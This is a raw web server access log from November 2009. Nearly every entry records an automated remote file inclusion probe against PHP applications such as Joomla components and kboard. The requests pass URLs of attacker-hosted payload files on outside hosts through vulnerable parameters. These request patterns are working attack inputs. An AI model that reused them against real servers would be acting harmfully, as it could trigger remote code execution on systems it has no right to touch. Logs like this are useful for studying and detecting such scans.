67.227.134.140 - - [13/Nov/2009:03:23:38 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:23:38 -0500] "GET /logs/access_log.Q109102100///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:23:43 -0500] "GET //netcat/modules/banner.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:23:43 -0500] "GET /logs//netcat/modules/banner.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:23:43 -0500] "GET /logs/access_log.Q109100300%20%20//netcat/modules/banner.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:11 -0500] "GET /logs/access_log.Q109102100%20%20///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:11 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:11 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:14 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:14 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:14 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:15 -0500] "GET /logs/access_log.Q109102100%20%20///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:15 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:15 -0500] "GET /logs/access_log.Q109102100%20%20///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:18 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:18 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:18 -0500] "GET /logs/access_log.Q109102100%20%20///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:18 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:18 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:18 -0500] "GET /logs/access_log.Q109102100///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:19 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:19 -0500] "GET /logs/access_log.Q109102100///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:19 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:20 -0500] "GET /logs/access_log.Q109102100///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:20 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:20 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:23 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:23 -0500] "GET /logs/access_log.Q109102100///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:24:23 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:25:11 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:25:11 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:25:11 -0500] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:25:20 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.125.66.59 - - [13/Nov/2009:03:25:22 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.205.103.171 - - [13/Nov/2009:03:25:28 -0500] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:25:28 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:25:28 -0500] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:25:29 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:25:39 -0500] "GET //export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:25:39 -0500] "GET /logs//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:25:39 -0500] "GET /logs/access_log.Q109082800%20%20//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:25:47 -0500] "GET /logs/access_log.Q109081900%20%20//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:26:31 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:26:31 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:26:33 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:26:33 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:26:33 -0500] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:26:51 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.47.61.97 - - [13/Nov/2009:03:27:01 -0500] "GET /logs/access_log.Q109102100///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.47.61.97 - - [13/Nov/2009:03:27:01 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.47.61.97 - - [13/Nov/2009:03:27:04 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:03:27:06 -0500] "GET /logs/administrator/components/com_moofaq/css/file_includer.php?file=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:03:27:06 -0500] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:03:27:06 -0500] "GET /logs/access_log.Q109062700%20%20/administrator/components/com_moofaq/css/file_includer.php?file=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:27:10 -0500] "GET //e404.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:27:10 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:27:11 -0500] "GET /logs/access_log.Q109100300//e404.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.181.7.128 - - [13/Nov/2009:03:27:30 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
202.131.226.52 - - [13/Nov/2009:03:27:35 -0500] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:27:35 -0500] "GET /logs/administrator/components/com_moofaq/css/file_includer.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:27:35 -0500] "GET /logs/access_log.Q109062700%20%20/administrator/components/com_moofaq/css/file_includer.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:27:37 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:27:37 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:27:37 -0500] "GET /logs/access_log.Q109052600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:27:40 -0500] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:27:40 -0500] "GET /logs/administrator/components/com_moofaq/css/file_includer.php?file=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:27:40 -0500] "GET /logs/access_log.Q109062700%20%20/administrator/components/com_moofaq/css/file_includer.php?file=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:27:47 -0500] "GET /logs/access_log.Q109092200//e404.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:27:47 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:27:47 -0500] "GET //e404.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:03:28:37 -0500] "GET /logs/access_log.Q109062700/administrator/components/com_moofaq/css/file_includer.php?file=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:28:39 -0500] "GET //e404.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:28:39 -0500] "GET /logs/access_log.Q109100300%20%20//e404.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:28:39 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:31:47 -0500] "GET /logs/access_log.Q109080200%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.47.61.97 - - [13/Nov/2009:03:31:50 -0500] "GET /logs///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.47.61.97 - - [13/Nov/2009:03:31:51 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.47.61.97 - - [13/Nov/2009:03:31:51 -0500] "GET /logs/access_log.Q109102100///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.248.172.98 - - [13/Nov/2009:03:32:50 -0500] "GET /logs/access_log.Q109062900 HTTP/1.0" 200 5053948 "http://easymoneyltd.info" "Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322"
202.131.226.52 - - [13/Nov/2009:03:33:08 -0500] "GET /logs/access_log.Q109062700/administrator/components/com_moofaq/css/file_includer.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:33:43 -0500] "GET /logs/access_log.Q109062700/administrator/components/com_moofaq/css/file_includer.php?file=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:34:40 -0500] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:34:40 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:35:54 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:35:55 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:35:55 -0500] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:35:55 -0500] "GET /logs/access_log.Q109051700%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:37:20 -0500] "GET /logs/access_log.Q109052600//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:37:20 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:37:29 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:38:50 -0500] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:38:50 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:38:50 -0500] "GET /logs/error_log.Q109051900%20%20/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:38:50 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:34 -0500] "GET /logs/error_log.Q109051900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:34 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:34 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:41 -0500] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:34 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 24069 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:43 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:43 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:44 -0500] "GET /logs/error_log.Q109051900%20%20/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:41 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:39:42 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 24069 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:39:52 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:39:53 -0500] "GET /logs/access_log.Q109052300/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:39:53 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:03 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:06 -0500] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:06 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:06 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:06 -0500] "GET /logs/access_log.Q109081500%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:07 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:07 -0500] "GET /logs/access_log.Q109081500%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:07 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:08 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:08 -0500] "GET /logs/access_log.Q109081500//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:08 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:09 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:09 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:09 -0500] "GET /logs/access_log.Q109081500//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:10 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:10 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:11 -0500] "GET /logs/access_log.Q109063000%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:12 -0500] "GET /logs/access_log.Q109063000%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:40:12 -0500] "GET /logs/access_log.Q109063000//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
